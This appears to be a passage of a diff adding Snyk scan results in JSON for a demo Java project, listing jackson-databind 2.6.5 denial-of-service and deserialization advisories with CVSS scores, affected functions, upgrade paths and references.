"0.00415", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-12086" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5ww9-j83m-q7qx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-05-19T10:19:10.287403Z", + "functions_new": [ + { + "version": [ + "[,2.9.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-05-17T18:12:58Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-05-17T18:12:58Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.785293Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.3" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-2421244", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.12.6.1", + "2.13.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable when using nested objects." + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer$Vanilla.java", + "className": "UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/deser/std/UntypedObjectDeserializer.java", + "className": "UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2816", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/3416", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.056720Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:21.238636Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:51.113569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.929583Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) via a large depth of nested objects.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.6.1, 2.13.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/8238ab41d0350fb915797c89d46777b4496b74fd)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/fcfc4998ec23f0b1f7f8a9521c2b317b6c25892b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2816)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/3416)\n", + "epssDetails": { + "percentile": "0.60309", + "probability": "0.00218", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36518" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-03-11T13:26:43.073121Z", + "functions_new": [ + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla", + "functionName": "mapArray" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "createContextual" + } + }, + { + "version": [ + "[,2.12.6.1)", + "[2.13.0, 2.13.2.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer", + "functionName": "mapObject" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-11T13:18:25Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-03-11T14:24:04Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.929583Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.6.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038424", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3582", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.201956Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.588412Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.271111Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.261115Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeFromArray()` function in `BeanDeserializer`, due to resource exhaustion when processing a deeply nested array.\r\n\r\n**NOTE:**\r\nFor this vulnerability to be exploitable the non-default `DeserializationFeature` must be enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50490)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/063183589218fec19a9293ed2f17ec53ea80ba88)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3582)\n", + "epssDetails": { + "percentile": "0.66401", + "probability": "0.00264", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42004" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:21:18.588353Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:07:28Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T10:05:31.043255Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.261115Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-3038426", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.4.0,2.12.7.1)", + "[2.13.0,2.13.4.1)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.12.7.1", + "2.13.4.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.9, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020", + "title": "Chromium Bugs" + }, + { + "url": "https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html%23UNWRAP_SINGLE_VALUE_ARRAYS", + "title": "Documentation" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3590", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.9, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:36.284440Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:50.575208Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:30.263069Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:57.258948Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) in the `_deserializeWrappedValue()` function in `StdDeserializer.java`, due to resource exhaustion when processing deeply nested arrays.\r\n\r\n**NOTE:** This vulnerability is only exploitable when the non-default `UNWRAP_SINGLE_VALUE_ARRAYS` feature is enabled.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.12.7.1, 2.13.4.1 or higher.\n## References\n- [Chromium Bugs](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=51020)\n- [Documentation](https://fasterxml.github.io/jackson-databind/javadoc/2.9/com/fasterxml/jackson/databind/DeserializationFeature.html#UNWRAP_SINGLE_VALUE_ARRAYS)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2c4a601c626f7790cad9d3c322d244e182838288)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/cd090979b7ea78c75e4de8a4aed04f7e9fa8deea)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d78d00ee7b5245b93103fef3187f70543d67ca33)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3590)\n", + "epssDetails": { + "percentile": "0.65501", + "probability": "0.00252", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-42003" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2022-10-02T09:41:44.046865Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-10-02T09:22:10Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2022-10-02T09:54:05Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.258948Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.12.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + "[2.8.0,2.8.9)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.1", + "2.7.9.1", + "2.8.9" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/JavanXD/Demo-Exploit-Jackson-RCE", + "title": "Exploit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/1599", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id&%23x3D%3B1462702", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.167922Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:28.679692Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:49.385289Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker may exploit this issue by sending a maliciously crafted input to the `readValue` method of the `ObjectMapper`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.9 or higher.\n## References\n- [Exploit](https://github.com/JavanXD/Demo-Exploit-Jackson-RCE)\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/60d459cedcf079c6106ae7da2ac562bc32dcabe1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1599)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1462702)\n", + "epssDetails": { + "percentile": "0.97700", + "probability": "0.57112", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-7525" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-qxxx-2pp7-5hmx" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2017-09-14T14:43:48.569000Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.1)", + "[2.7,2.7.9.1)", + "[2.8,2.8.9)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2017-04-10T21:00:00Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2017-09-14T14:43:48Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.385289Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.1" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31573", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Liao Xinxi" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.1)", + "[2.7.0,2.7.9.1)", + 